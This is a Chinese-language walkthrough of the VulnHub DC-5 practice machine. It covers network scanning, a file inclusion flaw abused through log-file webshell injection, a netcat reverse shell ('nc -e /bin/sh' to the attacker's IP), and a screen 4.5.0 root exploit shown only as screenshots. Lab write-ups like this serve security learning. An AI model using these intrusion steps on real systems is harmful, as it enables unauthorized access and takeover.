vulnhub DC-5 靶机

DC-5 靶机

前言:

这个靶机的难度相对于前面的难度更高。涉及到的知识有文件包含漏洞,反弹shell 以及后期的权限提升难度也是比较大的。

过关条件:得到root权限,获取flag

攻击机 : kali 192.168.56.132

受害机 : DC-5 192.168.56.146

内网信息探测
arp-scan -l         //通过mac地址确定靶机IP为 192.168.56.146

nmap -A -p1-65535 -T4 192.168.56.146    //扫描开放端口 80  111 50060
image-20230308093503597

开放80端口,存在web页面。可交互页面少,需要进行文件路径暴破。

暴破路径

使用kali自带的 dirsearch

image-20230308094035447

发现页面没有见过的文件 footer.php

image-20230308094237073

对比thankyou.php

image-20230308094322623

发现会随着刷新而改变

猜测文件包含漏洞。

文件包含漏洞

通过burp路径发现为 file下 ,然后写入一句话马。访问日志,发现成功写入

image-20230308095513472

使用蚁剑连接。

image-20230308095556973
反弹shell
nc -e /bin/sh 192.168.56.132 6666  //设置反弹shell

nc -lvnp 6666
//不是完整的shell环境 使用python的pty模块
python -c "import pty;pty.spawn('/bin/bash')"
image-20230308100055064
权限提升

根据命令得到存在 scree 4.50 提权漏洞

根据提示内容做文件。

image-20230311203027822

将做出来的两个文件上传到靶机当中。

image-20230311203422146
image-20230311203457281

执行操作

image-20230311203517201
image-20230311203532870
总结

难点在于对于提权文件的制作,以及前期对于文件包含漏洞的发现。